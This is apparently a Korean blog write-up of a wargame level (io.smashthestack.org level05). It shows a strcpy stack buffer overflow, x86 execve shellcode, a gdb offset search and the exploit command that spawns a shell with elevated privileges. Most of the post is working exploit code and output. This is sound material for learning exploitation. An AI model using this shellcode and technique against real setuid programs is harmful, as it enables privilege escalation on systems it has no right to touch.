티스토리 뷰
#include <stdio.h> #include <string.h> int main(int argc, char **argv) { char buf[128]; if(argc < 2) return 1; strcpy(buf, argv[1]); printf("%s\n", buf); return 0; }
그냥 BOF임
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e
\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80
25바이트 system("/bin/sh");
(gdb) r `python -c 'print "\x90" * 140 + "DDDD"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /levels/level05 `python -c 'print "\x90" * 140 + "DDDD"'`
DDDD
Program received signal SIGSEGV, Segmentation fault.
0x44444444 in ?? ()
0xbffffdfc: 0x90909000 0x90909090 0x90909090 0x90909090
0xbffffe0c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe1c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe2c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe3c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe4c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe5c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe6c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe7c: 0x90909090 0x90909090 0x90909090 0x44444490
level5@io:/levels$ ./level05 $(python -c 'print "\x90" * 115 +
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e
\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" + "\x11\xfe\xff\xbf"')
sh-4.2$ whoami
level6
sh-4.2$ id
uid=1005(level5) gid=1005(level5) euid=1006(level6) groups=1006(level6),1005(level5)
'Pwnable > io.smashthestack.org' 카테고리의 다른 글
| [io.smashthestack.org] level07 (0) | 2015.01.04 |
|---|---|
| [io.smashthestack.org] level06 (0) | 2015.01.04 |
| [io.smashthestack.org] level04 (0) | 2015.01.04 |
| [io.smashthestack.org] level03 (0) | 2015.01.04 |
| [io.smashthestack.org] level02 (0) | 2015.01.04 |